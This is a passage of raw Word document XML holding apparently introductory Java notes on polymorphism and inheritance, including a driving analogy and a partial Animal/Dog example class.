            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67CEC47C"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dd(int a, int b) and add(double a, double b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003428CE" w:rsidRPr="00CE4B95" w14:paraId="1EAA323D" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FC0D7B"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un-time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E9DE2CF"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ethod Overriding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A12CF5E"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keSound() in Dog and Cat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02560B4E" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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6E1701E">
          <v:rect id="_x0000_i1369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC6B34" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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eal-World Analogy for Polymorphism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A988C1"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magine you’re a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the object). You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>car</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bike</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truck</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. But, the action of "driving" will be different based on the type of vehicle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F01CF2" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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riving a Car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use a steering wheel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9338AB" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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riving a Bike</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use handlebars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1E045" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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riving a Truck</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use a large steering wheel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35A356" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3"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method name remains the same — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drive()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but the actual behavior changes based on the type of vehicle you drive. This is polymorphism in action!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C80624" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000D78D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196F28F">
          <v:rect id="_x0000_i1370" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50628627" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc196307605"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Inheritance?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="41FB616C" w14:textId="5F6440B3" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">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heritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the key features of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Object-Oriented Programming (OOP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows one class (child or subclass) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inherit properties and behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fields and methods) from another class (parent or superclass). This mechanism provides the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code, promote modularity, and create a hierarchical class structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D55069" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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Concepts of Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AC6BB" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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rent Class (Superclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The class whose properties and behaviors are inherited by another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626ADB4" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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hild Class (Subclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The class that inherits from the parent class. It can add its own properties and methods or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inherited methods to customize behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2ADF4" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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tends Keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The keyword used in Java to establish inheritance. The child class "extends" the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17384222" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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939F612">
          <v:rect id="_x0000_i1371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DD9AE" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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Types of Inheritance in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4E56B" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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ingle Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class inherits from only one parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6602015A" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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ultilevel Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class inherits from another class, and that class inherits from another class (creating a chain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FABE79" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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ierarchical Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple classes inherit from a single parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A0D90" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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ultiple Inheritance (Through Interface)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java doesn’t support multiple inheritance directly through classes, but it can be achieved using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12970C7B" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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FA1BA94">
          <v:rect id="_x0000_i1372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C682E1" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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How Inheritance Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597D46C" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically inherits all </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public</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protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> members (fields and methods) of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, except for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructor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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCEF2D" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730772E" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods and properties of the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958CD6A" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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dd new fields and methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific to itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD5412" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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verride methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the parent class to provide specialized behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761EF3FA" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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A7F6F6B">
          <v:rect id="_x0000_i1373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82BBED" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428C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of Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70418C"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Parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F7885"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F45EF"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arent class properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFA9D78"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77CE8E" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023BCC6C"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arent class method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DEC81"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eat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606DD37"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name + " is eating.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60617B58"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6C5BC2F" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD1090D"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void sleep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055177C"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name + " is sleeping.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72A8C4"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8C1544D"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BCBE1D2" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A2F295"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Child class inheriting from Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314107EF"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA3271"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dditional property in child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDF1FE"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breed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9680D" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A99F34"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hild class specific method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D57A0"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bark() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F273E6A"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name + " is barking.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F921F34"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3C40A29"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2C6974B" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
